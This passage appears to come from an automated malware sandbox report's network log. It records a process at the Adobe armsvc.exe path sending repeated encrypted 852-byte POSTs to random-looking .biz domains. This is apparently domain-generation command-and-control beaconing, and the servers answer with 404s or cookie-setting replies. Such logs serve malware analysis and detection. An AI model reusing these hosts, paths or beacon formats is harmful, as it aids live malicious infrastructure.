                                                                                                                                                                Nov 28, 2024 12:13:53.368021965 CET852OUTData Raw: a7 28 0e 0d 2a f7 d8 4a 48 03 00 00 c9 fb 88 64 74 5f c8 3a 25 9a 9b 94 cf 4e 51 1a a3 39 43 7b 2e 29 7a 2c 77 e3 0b 15 ca 82 42 c3 8e 40 4d 79 06 d8 cf 84 9f 2e a2 b4 36 97 46 33 8d c3 89 a6 fa f0 6c ef 72 c9 a8 b9 f7 89 a8 06 78 59 9d 39 05 8b
                                                                                                                                                                Data Ascii: (*JHdt_:%NQ9C{.)z,wB@My.6F3lrxY9$wn]/Np_)S_@?9Io\^\@GET2 ~/-L2jY/}1mVa1JUwX^'{NF)'H_%([xATDA3{
                                                                                                                                                                Nov 28, 2024 12:13:53.701627016 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:53 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 580
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                Nov 28, 2024 12:14:11.802828074 CET358OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: yunalwv.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:11.802855968 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:12.136631966 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:11 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 580
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                Nov 28, 2024 12:14:12.137566090 CET358OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: yunalwv.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:12.137662888 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:12.473395109 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:12 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 580
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                22192.168.2.224918513.251.16.150803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:54.369817019 CET352OUTPOST /nqtlxhjrub HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: qaynky.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:54.369838953 CET852OUTData Raw: c9 e7 ac b6 79 ba ca d3 48 03 00 00 6d b5 4a ea 35 41 77 38 41 d6 46 b5 c8 3f 65 c6 38 f7 f1 29 b9 1f 9c c6 5b 44 b5 4d 4b c8 ca 91 55 dc c7 05 8f 9b 22 a0 4b f1 96 6c 34 a1 95 2b 2b a0 10 8a 9c fe 92 9b 39 a8 9e 37 32 a4 76 f7 a1 a3 d6 3c df 0b
                                                                                                                                                                Data Ascii: yHmJ5Aw8AF?e8)[DMKU"Kl4++972v<.1YnIxm/ePku|5V4{;>slI.y"Pcw#<=rD/CPTZ;9HHeRjZ}90\b$e~\8{a4Bb
                                                                                                                                                                Nov 28, 2024 12:13:56.477401018 CET410INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:56 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=4a7069d728887beb527f5d9c4e2d2943|8.46.123.228|1732792436|1732792436|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                23192.168.2.224918644.221.84.10580
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:02.058919907 CET360OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: bumxkqgxu.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:02.058959007 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:03.249955893 CET413INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:03 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=07132753af640df4c40e01f0293c9eda|8.46.123.228|1732792443|1732792443|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                24192.168.2.224918754.244.188.17780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:03.509871006 CET359OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: dwrqljrr.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:03.509922028 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:04.919552088 CET412INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:04 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=6d0d2529ed264265f20a263abfdf7721|8.46.123.228|1732792444|1732792444|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                25192.168.2.224919554.244.188.17780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:10.286494017 CET360OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: oshhkdluh.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:10.286504030 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:11.646691084 CET413INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:11 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=110ecdcf7ea03180bcffcfc1ee76985d|8.46.123.228|1732792451|1732792451|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                26192.168.2.224919754.244.188.17780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:14.484957933 CET359OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: lrxdmhrr.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:14.484957933 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:15.842375040 CET412INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:15 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=c18e78590580350308040f993c69d829|8.46.123.228|1732792455|1732792455|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                27192.168.2.224919818.141.10.10780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:16.101162910 CET358OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: wllvnzb.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:16.101200104 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:18.085047960 CET411INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:17 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=a3ba9762a679e84bb94497b6ff88bd7c|8.46.123.228|1732792457|1732792457|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                28192.168.2.224919918.208.156.24880
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:18.349129915 CET356OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: gnqgo.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:18.349159956 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:19.537911892 CET409INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:19 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=30241183af168205776a11a816c6ab7a|8.46.123.228|1732792459|1732792459|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                29192.168.2.224920044.221.84.10580
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:19.784257889 CET359OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: jhvzpcfg.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:19.784285069 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:20.945897102 CET412INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:20 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=3ea9774096a2d46bd0a8e46cadb39451|8.46.123.228|1732792460|1732792460|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                30192.168.2.224920118.141.10.10780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:21.202102900 CET359OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: acwjcqqv.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
